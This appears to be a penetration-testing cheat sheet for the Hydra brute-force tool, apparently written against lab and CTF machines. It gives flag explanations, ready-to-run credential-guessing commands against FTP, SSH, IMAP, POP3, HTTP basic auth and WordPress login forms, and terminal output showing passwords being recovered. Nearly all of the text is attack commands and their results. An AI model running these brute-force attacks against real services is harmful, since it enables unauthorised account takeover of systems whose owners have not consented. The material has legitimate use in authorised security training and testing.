🐙HYDRA
-e nsr try "n" null password, "s" login as pass and/or "r" reversed login
-I : ignore hydra.restore file
-V : very verbose output
-f : stop when a logon is found
-L : username list
-u : rotate around usernames, not passwords
-P : passwords list
example
hydra -I -V -f -L usernames.txt -u -P /usr/share/seclists/Passwords/xato-net-10-million-passwords.txt 192.168.179.46 ftpHTTP Modules
hydra -h | grep "Supported services" | tr ":" "\n" | tr " " "\n" | column -e
http[s]-{head|get|post}
http[s]-post-form
hydra http-post-form -U
hydra -L <usernames list> -P <passwords list> -f -u <target ip> -s <port> http-get /
hydra -l <username> -P <password list> -f <target ip> -s <target port> http-post-form "/<login page>:<user parameter>=^USER^&<password parameter>=^PASS^:[F/S]=<failed/success string>"
code
hydra -l admin -P rockyou-50.txt http://10.10.10.75 http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^::Incorrect username"
example
Service Authentication Brute Forcing
SSH Attack
code
hydra -L <usernames list> -P <password list> -u -f ssh://<target ip> -t 4code
hydra -t 1 -L users.txt -P passwords.txt -vV <target ip > ssh<service>://<target ip>:<port>
hydra -L <usernames list> -P <password list> -u -f ssh://<target ip> -t 4
Examples
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh
Hydra Flags:
-l: Login with LOGIN name
-L: Load several logins from FILE
-p: Try password PASS
-P: Load several passwords from FILE
-C: FILE colon separated "login:pass" format, instead of -L/-P options
-u: loop around users, not passwords (effective! implied with -x)
-s: PORT if the service is on a different default port, define it here
-f: exit when a login/pass pair is found
-t: TASKS run TASKS number of connects in parallel per target (default: 16)
-4 / -6: Use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
FTP Attack
Reference:
code
hydra -l admin -P /usr/share/wordlists/rockyou.txt -e nsr -f ftp://192.168.68.46example
ali@kali:~$ hydra -l admin -P /usr/share/wordlists/rockyou.txt -e nsr -f ftp://192.168.68.46
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-12-27 17:43:40
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344402 login tries (l:1/p:14344402), ~896526 tries per task
[DATA] attacking ftp://192.168.68.46:21/
[21][ftp] host: 192.168.68.46 login: admin password: admin
[STATUS] attack finished for 192.168.68.46 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-12-27 17:43:44
kali@kali:~$HTTP ATTACK
code
hydra -l jim -P /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-10000.txt 192.168.135.52 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.135.52%2Fwp-admin%2F&testcookie=1:The password you entered for the username" -vV -fexample
┌──(eo㉿offsec)-[~]
└─$ hydra -l jim -P /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-10000.txt 192.168.135.52 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.135.52%2Fwp-admin%2F&testcookie=1:The password you entered for the username" -vV -f
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-09 07:36:59
[DATA] max 16 tasks per 1 server, overall 16 tasks, 10000 login tries (l:1/p:10000), ~625 tries per task
[DATA] attacking http-post-form://192.168.135.52:80/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.135.52%2Fwp-admin%2F&testcookie=1:The password you entered for the username
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[ATTEMPT] target 192.168.135.52 - login "jim" - pass "4321" - 751 of 10000 [child 2] (0/0)
[80][http-post-form] host: 192.168.135.52 login: jim password: kimberly
[STATUS] attack finished for 192.168.135.52 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-11-09 07:37:52example
hydra -l admin -P /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt 192.168.185.46 ftp -f -VBasic Auth
code
hydra -l offsec -P /usr/share/wordlists/rockyou.txt -s 242 -f 192.168.185.46 http-get /index.phpexample
┌──(19:31:43 eo㉿offsec)-[~]
└─$ hydra -l offsec -P /usr/share/wordlists/rockyou.txt -s 242 -f 192.168.185.46 http-get /index.php
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-12-07 19:31:58
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-get://192.168.185.46:242/index.php
[STATUS] 1481.00 tries/min, 1481 tries in 00:01h, 14342918 to do in 161:25h, 16 active
[STATUS] 1629.67 tries/min, 4889 tries in 00:03h, 14339510 to do in 146:40h, 16 active
[STATUS] 1674.14 tries/min, 11719 tries in 00:07h, 14332680 to do in 142:42h, 16 active
[242][http-get] host: 192.168.185.46 login: offsec password: elite
[STATUS] attack finished for 192.168.185.46 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-12-07 19:46:53
IppSec's Example
reference
code
hydra -C userpass.txt streamio.htb https-post-form "/login.php:username=^USER^&password=^PASS^:F=Login failed"example
Last updated